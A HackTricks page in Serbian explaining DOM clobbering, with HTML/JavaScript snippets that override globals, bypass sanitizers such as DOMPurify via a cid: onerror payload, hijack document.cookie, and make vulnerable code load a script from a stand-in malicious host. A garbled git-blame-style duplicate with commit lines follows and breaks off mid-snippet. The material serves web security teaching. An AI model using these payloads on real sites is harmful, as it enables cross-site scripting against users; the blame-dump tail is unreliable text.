hacktricks/pentesting-web/xss-cross-site-scripting/dom-clobbering.md

# Dom Clobbering

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## **Osnovi**

Moguće je generisati **globalne promenljive unutar JS konteksta** sa atributima **`id`** i **`name`** u HTML tagovima.
```html
<form id=x></form>
<script> console.log(typeof document.x) //[object HTMLFormElement] </script>
```
**Samo** određeni elementi mogu koristiti **name atribut** za klobiranje globalnih promenljivih, to su: `embed`, `form`, `iframe`, `image`, `img` i `object`.

Zanimljivo je da kada koristite **form element** za **klobiranje** promenljive, dobićete **`toString`** vrednost samog elementa: `[object HTMLFormElement]`, ali sa **anchor** **`toString`** će biti **`href`** ankera. Stoga, ako klobirate koristeći **`a`** tag, možete **kontrolisati** **vrednost** kada se **tretira kao string**:
```html
<a href="controlled string" id=x></a>
<script>
console.log(x);//controlled string
</script>
```
### Arrays & Attributes

Takođe je moguće **uništiti niz** i **atribute objekta**:
```html
<a id=x>
<a id=x name=y href=controlled>
<script>
console.log(x[1])//controlled
console.log(x.y)//controlled
</script>
```
Da biste prepisali **3. atribut** (npr. x.y.z), potrebno je da koristite **`form`**:
```html
<form id=x name=y><input id=z value=controlled></form>
<form id=x></form>
<script>
alert(x.y.z.value)//controlled
</script>
```
Clobbering više atributa je **složenije, ali i dalje moguće**, koristeći iframes:
```html
<iframe name=x srcdoc="<a id=y href=controlled></a>"></iframe>
<style>@import 'https://google.com';</style>
<script>alert(x.y)//controlled</script>
```
{% hint style="warning" %}
Tag stila se koristi da **omogući dovoljno vremena za renderovanje iframe-a**. Bez njega ćete dobiti upozorenje o **neodređenom**.
{% endhint %}

Da biste prepisali dublje atribute, možete koristiti **iframe-ove sa html kodiranjem** na sledeći način:
```html
<iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
<style>@import 'https://google.com';</style>
<script>
alert(a.b.c.d.e)//controlled
</script>
```
### **Zaobilaženje Filtra**

Ako filter **prolazi** kroz **atribute** čvora koristeći nešto poput `document.getElementByID('x').attributes`, mogli biste **prebrisati** atribut **`.attributes`** i **pokvariti filter**. Druga DOM svojstva kao što su **`tagName`**, **`nodeName`** ili **`parentNode`** i još mnogo toga su takođe **prebrisiva**.
```html
<form id=x></form>
<form id=y>
<input name=nodeName>
</form>
<script>
console.log(document.getElementById('x').nodeName)//FORM
console.log(document.getElementById('y').nodeName)//[object HTMLInputElement]
</script>
```
## **Clobbering `window.someObject`**

U JavaScript-u je uobičajeno pronaći:
```javascript
var someObject = window.someObject || {};
```
Manipulacija HTML-om na stranici omogućava prepisivanje `someObject` sa DOM čvorom, što potencijalno uvodi sigurnosne ranjivosti. Na primer, možete zameniti `someObject` sa elementom ankera koji upućuje na zloćudni skript:
```html
<a id=someObject href=//malicious-website.com/malicious.js></a>
```
U ranjivom kodu kao što je:
```html
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
```
Ova metoda koristi izvor skripte za izvršavanje neželjenog koda.

**Trik**: **`DOMPurify`** vam omogućava da koristite **`cid:`** protokol, koji **ne kodira URL dvostruke navodnike**. To znači da možete **ubaciti kodirane dvostruke navodnike koji će biti dekodirani u vreme izvršavanja**. Stoga, ubacivanje nečega poput **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** će učiniti da HTML kodirani `&quot;` bude **dekodiran u vreme izvršavanja** i **izbegne** iz vrednosti atributa kako bi **stvorio** **`onerror`** događaj.

Druga tehnika koristi **`form`** element. Određene biblioteke na klijentskoj strani ispituju atribute novokreiranog form elementa kako bi ih očistile. Međutim, dodavanjem `input` sa `id=attributes` unutar forme, efikasno prepisujete svojstvo atributa, sprečavajući sanitizator da pristupi stvarnim atributima.

Možete [**pronaći primer ove vrste prepisivanja u ovom CTF izveštaju**](iframes-in-xss-and-csp.md#iframes-in-sop-2).

## Prepisivanje objekta dokumenta

Prema dokumentaciji, moguće je prepisati atribute objekta dokumenta koristeći DOM Clobbering:

> [Document](https://html.spec.whatwg.org/multipage/dom.html#document) interfejs [podržava imenovane atribute](https://webidl.spec.whatwg.org/#dfn-support-named-properties). [Podržana imena svojstava](https://webidl.spec.whatwg.org/#dfn-supported-property-names) objekta [Document](https://html.spec.whatwg.org/multipage/dom.html#document) u bilo kom trenutku se sastoje od sledećih, u [redosledu stabla](https://dom.spec.whatwg.org/#concept-tree-order) prema elementu koji ih je doprineo, ignorišući kasnije duplikate, i sa vrednostima iz [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atributa koji dolaze pre vrednosti iz imenskih atributa kada isti element doprinosi oboma:
>
> \- Vrednost atributa sadržaja imena za sve [izložene](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), i [izložene](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elemente koji imaju ne-prazan atribut sadržaja imena i koji su [u stablu dokumenata](https://dom.spec.whatwg.org/#in-a-document-tree) sa dokumentom kao njihovim [korenom](https://dom.spec.whatwg.org/#concept-tree-root);\
> \
> \- Vrednost [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atributa sadržaja za sve [izložene](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elemente koji imaju ne-prazan [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atribut sadržaja i koji su [u stablu dokumenata](https://dom.spec.whatwg.org/#in-a-document-tree) sa dokumentom kao njihovim [korenom](https://dom.spec.whatwg.org/#concept-tree-root);\
> \
> \- Vrednost [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atributa sadržaja za sve [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) elemente koji imaju i ne-prazan [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atribut sadržaja i ne-prazan atribut sadržaja imena, i koji su [u stablu dokumenata](https://dom.spec.whatwg.org/#in-a-document-tree) sa dokumentom kao njihovim [korenom](https://dom.spec.whatwg.org/#concept-tree-root).

Korišćenjem ove tehnike možete prepisati često korišćene **vrednosti kao što su `document.cookie`, `document.body`, `document.children`**, pa čak i metode u Document interfejsu kao što je `document.querySelector`.
```javascript
document.write("<img name=cookie />")

document.cookie
<img name="cookie">

typeof(document.cookie)
'object'

//Something more sanitize friendly than a img tag
document.write("<form name=cookie><input id=toString></form>")

document.cookie
HTMLCollection(2) [img, form, cookie: img]

typeof(document.cookie)
'object
```
## Pisanje nakon elementa koji je prepisan

Rezultati poziva **`document.getElementById()`** i **`document.querySelector()`** mogu se promeniti injektovanjem `<html>` ili `<body>` taga sa identičnim id atributom. Evo kako to može da se uradi:
```html
<div style="display:none" id="cdnDomain" class="x">test</div>
<p>
<html id="cdnDomain" class="x">clobbered</html>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
alert(document.querySelector('.x').innerText); // Clobbered
</script>
```
Pored toga, korišćenjem stilova za skrivanje ovih ubačenih HTML/body tagova, može se sprečiti ometanje od strane drugog teksta u `innerText`, čime se povećava efikasnost napada:
```html
<div style="display:none" id="cdnDomain">test</div>
<p>existing text</p>
<html id="cdnDomain">clobbered</html>
<style>
p{display:none;}
</style>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
Istraživanja o SVG su otkrila da se `<body>` tag takođe može efikasno koristiti:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg><body id="cdnDomain">clobbered</body></svg>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
Da bi HTML tag funkcionisao unutar SVG u pretraživačima kao što su Chrome i Firefox, potreban je `<foreignobject>` tag:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
<foreignobject>
<html id="cdnDomain">clobbered</html>
</foreignobject>
</svg>
<script>
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
## Clobbering Forms

Moguće je dodati **nove unose unutar forme** jednostavno tako što ćete **navesti `form` atribut** unutar nekih oznaka. Možete to koristiti da **dodate nove vrednosti unutar forme** i čak dodate novi **dugme** za **slanje** (clickjacking ili zloupotreba nekog `.click()` JS koda):

{% code overflow="wrap" %}
```html
<!--Add a new attribute and a new button to send-->
<textarea form=id-other-form name=info>
";alert(1);//
</textarea>
<button form=id-other-form type="submit" formaction="/edit" formmethod="post">
Click to send!
</button>
```
{% endcode %}

* Za više atributa forme u [**dugmetu proverite ovo**](https://www.w3schools.com/tags/tag\_button.asp)**.**

## Reference

* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
* [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
* Heyes, Gareth. JavaScript za hakere: Naučite da razmišljate kao haker.

{% hint style="success" %}
Naučite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Naučite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Podržite HackTricks</summary>

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>
{% endhint %}
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								# Dom Clobbering
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								{% hint style="success" %}
 								Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								<details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								<summary>Support HackTricks</summary>
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
 								</details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								{% endhint %}
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								## **Osnovi**
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								Moguće je generisati **globalne promenljive unutar JS konteksta** sa atributima **`id`** i **`name`** u HTML tagovima.
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```html
 								<form id=x></form>
 								<script> console.log(typeof document.x) //[object HTMLFormElement] </script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								**Samo** određeni elementi mogu koristiti **name atribut** za klobiranje globalnih promenljivih, to su: `embed`, `form`, `iframe`, `image`, `img` i `object`.
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Zanimljivo je da kada koristite **form element** za **klobiranje** promenljive, dobićete **`toString`** vrednost samog elementa: `[object HTMLFormElement]`, ali sa **anchor** **`toString`** će biti **`href`** ankera. Stoga, ako klobirate koristeći **`a`** tag, možete **kontrolisati** **vrednost** kada se **tretira kao string**:
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```html
 								<a href="controlled string" id=x></a>
 								<script>
 								console.log(x);//controlled string
 								</script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								### Arrays & Attributes
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Takođe je moguće **uništiti niz** i **atribute objekta**:
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```html
 								<a id=x>
 								<a id=x name=y href=controlled>
 								<script>
 								console.log(x[1])//controlled
 								console.log(x.y)//controlled
 								</script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Da biste prepisali **3. atribut** (npr. x.y.z), potrebno je da koristite **`form`**:
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```html
 								<form id=x name=y><input id=z value=controlled></form>
 								<form id=x></form>
 								<script>
 								alert(x.y.z.value)//controlled
 								</script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Clobbering više atributa je **složenije, ali i dalje moguće**, koristeći iframes:
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```html
 								<iframe name=x srcdoc="<a id=y href=controlled></a>"></iframe>
 								<style>@import 'https://google.com';</style>
 								<script>alert(x.y)//controlled</script>
 								```
 								{% hint style="warning" %}
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Tag stila se koristi da **omogući dovoljno vremena za renderovanje iframe-a**. Bez njega ćete dobiti upozorenje o **neodređenom**.
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								{% endhint %}
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Da biste prepisali dublje atribute, možete koristiti **iframe-ove sa html kodiranjem** na sledeći način:
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```html
 								<iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
 								<style>@import 'https://google.com';</style>
 								<script>
 								alert(a.b.c.d.e)//controlled
 								</script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								### **Zaobilaženje Filtra**
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Ako filter **prolazi** kroz **atribute** čvora koristeći nešto poput `document.getElementByID('x').attributes`, mogli biste **prebrisati** atribut **`.attributes`** i **pokvariti filter**. Druga DOM svojstva kao što su **`tagName`**, **`nodeName`** ili **`parentNode`** i još mnogo toga su takođe **prebrisiva**.
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```html
 								<form id=x></form>
 								<form id=y>
 								<input name=nodeName>
 								</form>
 								<script>
 								console.log(document.getElementById('x').nodeName)//FORM
 								console.log(document.getElementById('y').nodeName)//[object HTMLInputElement]
 								</script>
 								```
 								## **Clobbering `window.someObject`**
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								U JavaScript-u je uobičajeno pronaći:
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```javascript
 								var someObject = window.someObject || {};
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Manipulacija HTML-om na stranici omogućava prepisivanje `someObject` sa DOM čvorom, što potencijalno uvodi sigurnosne ranjivosti. Na primer, možete zameniti `someObject` sa elementom ankera koji upućuje na zloćudni skript:
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								```html
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								<a id=someObject href=//malicious-website.com/malicious.js></a>
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								```
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								U ranjivom kodu kao što je:
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```html
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								<script>
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								window.onload = function(){
 								let someObject = window.someObject || {};
 								let script = document.createElement('script');
 								script.src = someObject.url;
 								document.body.appendChild(script);
 								};
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								</script>
-												GITBOOK-3800: No subject

											
										
										
											2023-03-03 15:39:23 +00:00
+								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Ova metoda koristi izvor skripte za izvršavanje neželjenog koda.
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								**Trik**: **`DOMPurify`** vam omogućava da koristite **`cid:`** protokol, koji **ne kodira URL dvostruke navodnike**. To znači da možete **ubaciti kodirane dvostruke navodnike koji će biti dekodirani u vreme izvršavanja**. Stoga, ubacivanje nečega poput **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** će učiniti da HTML kodirani `&quot;` bude **dekodiran u vreme izvršavanja** i **izbegne** iz vrednosti atributa kako bi **stvorio** **`onerror`** događaj.
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Druga tehnika koristi **`form`** element. Određene biblioteke na klijentskoj strani ispituju atribute novokreiranog form elementa kako bi ih očistile. Međutim, dodavanjem `input` sa `id=attributes` unutar forme, efikasno prepisujete svojstvo atributa, sprečavajući sanitizator da pristupi stvarnim atributima.
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Možete [**pronaći primer ove vrste prepisivanja u ovom CTF izveštaju**](iframes-in-xss-and-csp.md#iframes-in-sop-2).
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								## Prepisivanje objekta dokumenta
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								Prema dokumentaciji, moguće je prepisati atribute objekta dokumenta koristeći DOM Clobbering:
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								> [Document](https://html.spec.whatwg.org/multipage/dom.html#document) interfejs [podržava imenovane atribute](https://webidl.spec.whatwg.org/#dfn-support-named-properties). [Podržana imena svojstava](https://webidl.spec.whatwg.org/#dfn-supported-property-names) objekta [Document](https://html.spec.whatwg.org/multipage/dom.html#document) u bilo kom trenutku se sastoje od sledećih, u [redosledu stabla](https://dom.spec.whatwg.org/#concept-tree-order) prema elementu koji ih je doprineo, ignorišući kasnije duplikate, i sa vrednostima iz [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atributa koji dolaze pre vrednosti iz imenskih atributa kada isti element doprinosi oboma:
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								> \- Vrednost atributa sadržaja imena za sve [izložene](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), i [izložene](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elemente koji imaju ne-prazan atribut sadržaja imena i koji su [u stablu dokumenata](https://dom.spec.whatwg.org/#in-a-document-tree) sa dokumentom kao njihovim [korenom](https://dom.spec.whatwg.org/#concept-tree-root);\
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								> \
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								> \- Vrednost [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atributa sadržaja za sve [izložene](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elemente koji imaju ne-prazan [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atribut sadržaja i koji su [u stablu dokumenata](https://dom.spec.whatwg.org/#in-a-document-tree) sa dokumentom kao njihovim [korenom](https://dom.spec.whatwg.org/#concept-tree-root);\
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								> \
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								> \- Vrednost [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atributa sadržaja za sve [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) elemente koji imaju i ne-prazan [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) atribut sadržaja i ne-prazan atribut sadržaja imena, i koji su [u stablu dokumenata](https://dom.spec.whatwg.org/#in-a-document-tree) sa dokumentom kao njihovim [korenom](https://dom.spec.whatwg.org/#concept-tree-root).
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Korišćenjem ove tehnike možete prepisati često korišćene **vrednosti kao što su `document.cookie`, `document.body`, `document.children`**, pa čak i metode u Document interfejsu kao što je `document.querySelector`.
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
+								```javascript
 								document.write("<img name=cookie />")
 								document.cookie
 								<img name="cookie">
 								typeof(document.cookie)
 								'object'
 								//Something more sanitize friendly than a img tag
 								document.write("<form name=cookie><input id=toString></form>")
 								document.cookie
 								HTMLCollection(2) [img, form, cookie: img]
 								typeof(document.cookie)
 								'object
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								## Pisanje nakon elementa koji je prepisan
-												GitBook: [#3603] No subject

											
										
										
											2022-10-13 00:56:34 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Rezultati poziva **`document.getElementById()`** i **`document.querySelector()`** mogu se promeniti injektovanjem `<html>` ili `<body>` taga sa identičnim id atributom. Evo kako to može da se uradi:
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								```html
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								<div style="display:none" id="cdnDomain" class="x">test</div>
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								<p>
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								<html id="cdnDomain" class="x">clobbered</html>
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								<script>
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								alert(document.getElementById('cdnDomain').innerText); // Clobbered
 								alert(document.querySelector('.x').innerText); // Clobbered
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								</script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Pored toga, korišćenjem stilova za skrivanje ovih ubačenih HTML/body tagova, može se sprečiti ometanje od strane drugog teksta u `innerText`, čime se povećava efikasnost napada:
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								```html
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								<div style="display:none" id="cdnDomain">test</div>
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								<p>existing text</p>
 								<html id="cdnDomain">clobbered</html>
 								<style>
 								p{display:none;}
 								</style>
 								<script>
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								alert(document.getElementById('cdnDomain').innerText); // Clobbered
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								</script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Istraživanja o SVG su otkrila da se `<body>` tag takođe može efikasno koristiti:
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								```html
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								<div style="display:none" id="cdnDomain">example.com</div>
 								<svg><body id="cdnDomain">clobbered</body></svg>
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								<script>
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								alert(document.getElementById('cdnDomain').innerText); // Clobbered
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								</script>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 16:26:52 +00:00
+								Da bi HTML tag funkcionisao unutar SVG u pretraživačima kao što su Chrome i Firefox, potreban je `<foreignobject>` tag:
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								```html
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								<div style="display:none" id="cdnDomain">example.com</div>
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								<svg>
 								<foreignobject>
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								<html id="cdnDomain">clobbered</html>
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								</foreignobject>
 								</svg>
 								<script>
-												a

											
